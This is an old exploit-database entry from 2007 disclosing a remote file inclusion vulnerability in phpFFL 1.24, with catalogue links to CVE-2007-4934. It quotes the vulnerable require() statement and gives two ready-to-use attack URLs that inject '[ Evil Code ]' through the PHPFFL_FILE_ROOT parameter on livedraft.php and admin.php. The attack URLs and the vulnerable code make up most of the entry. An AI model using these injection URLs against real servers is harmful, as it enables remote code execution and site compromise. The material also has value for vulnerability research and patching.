******************************************************************************* # Title : phpFFL 1.24 Remote File Inclusion Vulnerability ******************************************************************************* # Title : phpFFL 1.24 Remote File Inclusion Vulnerability # Author : Dj7xpl # Contact : Dj7xpl@r00t.ir # Dawnload : http://sourceforge.net/project/showfiles.php?group_id=137531 # Gr33tZ : Y! Underground Group , Ir_R57 , Mehrdad AliZade ******************************************************************************* Vuln Code: require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php"); require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php"); [[Remote]]] http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ] http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ] """"""""""""""""""""" # milw0rm.com [2007-09-14]
Related Exploits
Trying to match CVEs (1): CVE-2007-4934Trying to match OSVDBs (2): 37085, 37086
Trying to match setup file: ca5cfcecb4e40e6bd46f9c94f7f5a68f
Other Possible E-DB Search Terms: phpFFL 1.24, phpFFL
Date | D | V | Title | Author | No matches |
---|